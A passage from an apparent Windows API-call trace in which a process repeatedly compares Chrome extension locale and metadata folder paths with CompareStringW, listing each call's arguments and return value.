Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount2=131) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount2=131) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount2=132) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount2=132) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount2=132) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount2=132) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount2=130) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount2=130) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\", cchCount2=131) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\", cchCount2=131) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\", cchCount2=131) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\", cchCount2=131) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount2=132) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount2=132) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount2=132) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount2=132) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount2=132) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount2=132) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount2=132) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount2=130) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount2=130) returned 3 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount2=130) returned 1 [0280.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, 